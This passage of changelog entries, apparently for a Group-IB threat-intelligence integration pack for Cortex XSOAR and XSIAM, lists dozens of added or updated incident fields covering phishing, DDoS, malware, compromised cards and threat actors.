Drop Email Domain incident field to support new collections. +##### New: GIB Date First Compromised + +- New: Added a new incident field- GIB Date First Compromised that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Payment System + +- Updated the GIB Payment System incident field to support new collections. +##### New: GIB Nation-State Cybercriminals Threat Actor Roles + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Actor Roles that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Phishing Kit Path + +- New: Added a new incident field- GIB Phishing Kit Path that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Malware Table + +- New: Added a new incident field- GIB Malware Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Phishing Sources + +- New: Added a new incident field- GIB Phishing Sources that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Request Headers Body + +- New: Added a new incident field- GIB DDOS Request Headers Body that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Nation-State Cybercriminal Forums Table + +- New: Added a new incident field- GIB Nation-State Cybercriminal Forums Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Nation-State Cybercriminals Threat Countries + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Countries that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB OSI Git Repository Files Table + +- New: Added a new incident field- GIB OSI Git Repository Files Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Emails + +- New: Added a new incident field- GIB Emails that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Target City + +- New: Added a new incident field- GIB DDOS Target City that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Drop Email + +- Updated the GIB Drop Email incident field to support new collections. +##### New: GIB Nation-State Cybercriminals Threat Actor CVE + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Actor CVE that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Deface Contacts + +- New: Added a new incident field- GIB Deface Contacts that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Organization IBAN + +- New: Added a new incident field- GIB Organization IBAN that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Compromised Events Table + +- New: Added a new incident field- GIB Compromised Events Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Repository + +- Updated the GIB Repository incident field to support new collections. +##### New: GIB Deface Source + +- New: Added a new incident field- GIB Deface Source that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Organization BSB + +- New: Added a new incident field- GIB Organization BSB that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Cybercriminal Threat Description + +- New: Added a new incident field- GIB Cybercriminal Threat Description that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Phishing Brand + +- New: Added a new incident field- GIB Phishing Brand that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Card Valid Thru + +- Updated the GIB Card Valid Thru incident field to support new collections. +##### New: GIB Downloaded From Table + +- New: Added a new incident field- GIB Downloaded From Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB CNC + +- New: Added a new incident field- GIB CNC that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Compromised Events Information Table + +- New: Added a new incident field- GIB Compromised Events Information Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Request Body + +- New: Added a new incident field- GIB DDOS Request Body that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB CNC URL + +- New: Added a new incident field- GIB CNC URL that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Email + +- Updated the GIB Email incident field to support new collections. +##### New: GIB Date First Seen + +- New: Added a new incident field- GIB Date First Seen that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Passwords + +- New: Added a new incident field- GIB Passwords that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Target Region + +- New: Added a new incident field- GIB Target Region that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB HTML + +- Updated the GIB HTML incident field to support new collections. +##### New: GIB Nation-State Cybercriminals Malware + +- New: Added a new incident field- GIB Nation-State Cybercriminals Malware that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Admiralty Code + +- Updated the GIB Admiralty Code incident field to support new collections. +##### New: GIB Mirror Link + +- New: Added a new incident field- GIB Mirror Link that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Phishing Kit Source + +- New: Added a new incident field- GIB Phishing Kit Source that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Cybercriminal Regions + +- New: Added a new incident field- GIB Cybercriminal Regions that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Card Issuer + +- Updated the GIB Card Issuer incident field to support new collections. +##### New: GIB Phishing Objectives + +- New: Added a new incident field- GIB Phishing Objectives that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Source + +- Updated the GIB Source incident field to support new collections. +##### New: GIB Cybercriminal Malware + +- New: Added a new incident field- GIB Cybercriminal Malware that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Card Type + +- Updated the GIB Card Type incident field to support new collections. +##### New: GIB DDOS Date Registration + +- New: Added a new incident field- GIB DDOS Date Registration that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Title + +- Updated the GIB Title incident field to support new collections. +##### New: GIB Malware Aliases + +- New: Added a new incident field- GIB Malware Aliases that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Report Number + +- New: Added a new incident field- GIB Report Number that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Provider Domain + +- New: Added a new incident field- GIB Provider Domain that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Phishing Registrar + +- New: Added a new incident field- GIB Phishing Registrar that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Date Created At + +- New: Added a new incident field- GIB Date Created At that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Threat Actor Country + +- New: Added a new incident field- GIB Threat Actor Country that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Service IP + +- New: Added a new incident field- GIB Service IP that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Nation-State Cybercriminals Threat Actor Goals + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Actor Goals that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Reporter + +- New: Added a new incident field- GIB Reporter that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Favicon + +- Updated the GIB Favicon incident field to support new collections. +##### New: GIB Nation-State Cybercriminals Threat Actor Description + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Actor Description that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Phishing Date Detected + +- New: Added a new incident field- GIB Phishing Date Detected that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Data Hash + +- Updated the GIB Data Hash incident field to support new collections. +##### New: GIB VPN Names + +- New: Added a new incident field- GIB VPN Names that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Matches Table + +- New: Added a new incident field- GIB Matches Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Nation-State Cybercriminals Threat Actor Country + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Actor Country that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Phishing Date Added + +- New: Added a new incident field- GIB Phishing Date Added that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Organization SWIFT + +- New: Added a new incident field- GIB Organization SWIFT that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB CPE Table + +- New: Added a new incident field- GIB CPE Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Extended CVSS Exploitability + +- New: Added a new incident field- GIB Extended CVSS Exploitability that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Date Compromised + +- Updated the GIB Date Compromised incident field to support new collections. +##### New: GIB Extended CVSS Base + +- New: Added a new incident field- GIB Extended CVSS Base that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Malware Regions + +- New: Added a new incident field- GIB Malware Regions that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Date Expired + +- Updated the GIB Date Expired incident field to support new collections. +##### New: GIB Organization BIC + +- New: Added a new incident field- GIB Organization BIC that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Service Domain + +- New: Added a new incident field- GIB Service Domain that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Cybercriminal Threat Actor Reports Table + +- New: Added a new incident field- GIB Cybercriminal Threat Actor Reports Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Date Begin + +- New: Added a new incident field- GIB DDOS Date Begin that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Screenshot + +- Updated the GIB Screenshot incident field to support new collections. +##### New: GIB DDOS Date End + +- New: Added a new incident field- GIB DDOS Date End that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Extended CVSS Overall + +- New: Added a new incident field- GIB Extended CVSS Overall that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Name Servers + +- Updated the GIB Name Servers incident field to support new collections. +##### New: GIB Deface Date + +- New: Added a new incident field- GIB Deface Date that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Affected Software Table + +- New: Added a new incident field- GIB Affected Software Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Malware Short Description + +- New: Added a new incident field- GIB Malware Short Description that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Related Indicators Data + +- Updated the GIB Related Indicators Data incident field to support new collections. +##### GIB Downloaded From + +- Updated the GIB Downloaded From incident field to support new collections. +##### New: GIB Target Domain Provider + +- New: Added a new incident field- GIB Target Domain Provider that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Protocol + +- New: Added a new incident field- GIB DDOS Protocol that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Target ASN + +- New: Added a new incident field- GIB DDOS Target ASN that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Date Last Compromised + +- New: Added a new incident field- GIB Date Last Compromised that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Cybercriminal Expertises + +- New: Added a new incident field- GIB Cybercriminal Expertises that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Malware Langs + +- New: Added a new incident field- GIB Malware Langs that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Compromised Login + +- Updated the GIB Compromised Login incident field to support new collections. +##### New: GIB Extended CVSS Temporal + +- New: Added a new incident field- GIB Extended CVSS Temporal that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Leaked Data + +- Updated the GIB Leaked Data incident field to support new collections. +##### GIB Password + +- Updated the GIB Password incident field to support new collections. +##### GIB Threat Actor ID + +- Updated the GIB Threat Actor ID incident field to support new collections. +##### New: GIB Href + +- New: Added a new incident field- GIB Href that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Phishing Domain Puny + +- New: Added a new incident field- GIB Phishing Domain Puny that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Proxy Source + +- New: Added a new incident field- GIB Proxy Source that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Phishing URLs + +- New: Added a new incident field- GIB Phishing URLs that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Phishing Domain + +- Updated the GIB Phishing Domain incident field to support new collections. +##### New: GIB Phishing IP Table + +- New: Added a new incident field- GIB Phishing IP Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Extended CVSS Impact + +- New: Added a new incident field- GIB Extended CVSS Impact that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Parsed Login Domain + +- New: Added a new incident field- GIB Parsed Login Domain that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Malware Description + +- New: Added a new incident field- GIB Malware Description that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Leak Name + +- Updated the GIB Leak Name incident field to support new collections. +##### GIB Threat Actor is APT + +- Updated the GIB Threat Actor is APT incident field to support new collections. +##### New: GIB Proxy Sources + +- New: Added a new incident field- GIB Proxy Sources that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Deface Site URL + +- New: Added a new incident field- GIB Deface Site URL that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Malware CNC Domain + +- New: Added a new incident field- GIB Malware CNC Domain that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Parsed Login IP + +- New: Added a new incident field- GIB Parsed Login IP that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Target Category + +- Updated the GIB Target Category incident field to support new collections. +##### New: GIB Bulletin Family + +- New: Added a new incident field- GIB Bulletin Family that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Target URL + +- New: Added a new incident field- GIB DDOS Target URL that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Duration + +- New: Added a new incident field- GIB DDOS Duration that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Nation-State Cybercriminals Sectors + +- New: Added a new incident field- GIB Nation-State Cybercriminals Sectors that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Cybercriminal Threat Title + +- New: Added a new incident field- GIB Cybercriminal Threat Title that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Target City + +- New: Added a new incident field- GIB Target City that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Leak Published + +- New: Added a new incident field- GIB Leak Published that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Target IP + +- New: Added a new incident field- GIB DDOS Target IP that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB CNC Domain + +- New: Added a new incident field- GIB CNC Domain that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Cybercriminal Threat Actor Aliases + +- New: Added a new incident field- GIB Cybercriminal Threat Actor Aliases that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Target Category + +- New: Added a new incident field- GIB DDOS Target Category that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Target ASN + +- New: Added a new incident field- GIB Target ASN that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Source + +- New: Added a new incident field- GIB DDOS Source that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Card Number + +- Updated the GIB Card Number incident field to support new collections. +##### New: GIB Malware File hash + +- New: Added a new incident field- GIB Malware File hash that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Malware Categories + +- New: Added a new incident field- GIB Malware Categories that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Cybercriminal Threat Actor Description + +- New: Added a new incident field- GIB Cybercriminal Threat Actor Description that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Nation-State Cybercriminals Threat Title + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Title that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Phishing Status + +- Updated the GIB Phishing Status incident field to support new collections. +##### New: GIB Has Exploit + +- New: Added a new incident field- GIB Has Exploit that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Phishing Kit Table + +- New: Added a new incident field- GIB Phishing Kit Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Service URL + +- New: Added a new incident field- GIB Service URL that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Inject MD5 + +- Updated the GIB Inject MD5 incident field to support new collections. +##### GIB Phishing Type + +- Updated the GIB Phishing Type incident field to support new collections. +##### New: GIB Date Add + +- New: Added a new incident field- GIB Date Add that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB CVV + +- Updated the GIB CVV incident field to support new collections. +##### New: GIB Phishing Domain Expiration Date + +- New: Added a new incident field- GIB Phishing Domain Expiration Date that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Portal Link + +- Updated the GIB Portal Link incident field to support new collections. +##### New: GIB Date Updated At + +- New: Added a new incident field- GIB Date Updated At that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Threat Actors Table + +- New: Added a new incident field- GIB Threat Actors Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Person + +- Updated the GIB Person incident field to support new collections. +##### New: GIB Compromised Account + +- New: Added a new incident field- GIB Compromised Account that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Credibility + +- Updated the GIB Credibility incident field to support new collections. +##### GIB Severity + +- Updated the GIB Severity incident field to support new collections. +##### New: GIB DDOS Target Region + +- New: Added a new incident field- GIB DDOS Target Region that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Target Domain + +- Updated the GIB Target Domain incident field to support new collections. +##### New: GIB Extended Description + +- New: Added a new incident field- GIB Extended Description that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Threat Actor Name + +- Updated the GIB Threat Actor Name incident field to support new collections. +##### New: GIB Date Incident + +- New: Added a new incident field- GIB Date Incident that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Socks Proxy Source + +- New: Added a new incident field- GIB Socks Proxy Source that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Link List Table + +- New: Added a new incident field- GIB Link List Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Merged Cvss + +- New: Added a new incident field- GIB Merged Cvss that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Update Time + +- New: Added a new incident field- GIB Update Time that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB GIT Source + +- New: Added a new incident field- GIB GIT Source that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Nation-State Cybercriminals Threat Sectors + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Sectors that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB CNC Port + +- New: Added a new incident field- GIB CNC Port that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Date of Detection + +- Updated the GIB Date of Detection incident field to support new collections. +##### New: GIB Cybercriminal Sectors + +- New: Added a new incident field- GIB Cybercriminal Sectors that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Address + +- Updated the GIB Address incident field to support new collections. +##### New: GIB Proxy Type + +- New: Added a new incident field- GIB Proxy Type that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Nation-State Cybercriminals Threat Actor Reports Table + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Actor Reports Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Phishing Kit Emails + +- Updated the GIB Phishing Kit Emails incident field to support new collections. +##### New: CPE Table + +- New: Added a new incident field- CPE Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Date Created + +- Updated the GIB Date Created incident field to support new collections. +##### New: GIB DDOS Request Body Hash + +- New: Added a new incident field- GIB DDOS Request Body Hash that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Request Data Link + +- New: Added a new incident field- GIB DDOS Request Data Link that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Nation-State Cybercriminals Threat Report Number + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Report Number that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Victim IP + +- Updated the GIB Victim IP incident field to support new collections. +##### New: GIB Upload Time + +- New: Added a new incident field- GIB Upload Time that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Target Provider + +- New: Added a new incident field- GIB DDOS Target Provider that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Reliability + +- Updated the GIB Reliability incident field to support new collections. +##### New: GIB Nation-State Cybercriminals Regions + +- New: Added a new incident field- GIB Nation-State Cybercriminals Regions that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Type + +- New: Added a new incident field- GIB DDOS Type that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Nation-State Cybercriminals Threat Actor Labels + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Actor Labels that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Organization CLABE + +- New: Added a new incident field- GIB Organization CLABE that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB ID + +- Updated the GIB ID incident field to support new collections. +##### New: GIB Date Modified + +- New: Added a new incident field- GIB Date Modified that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Target IP 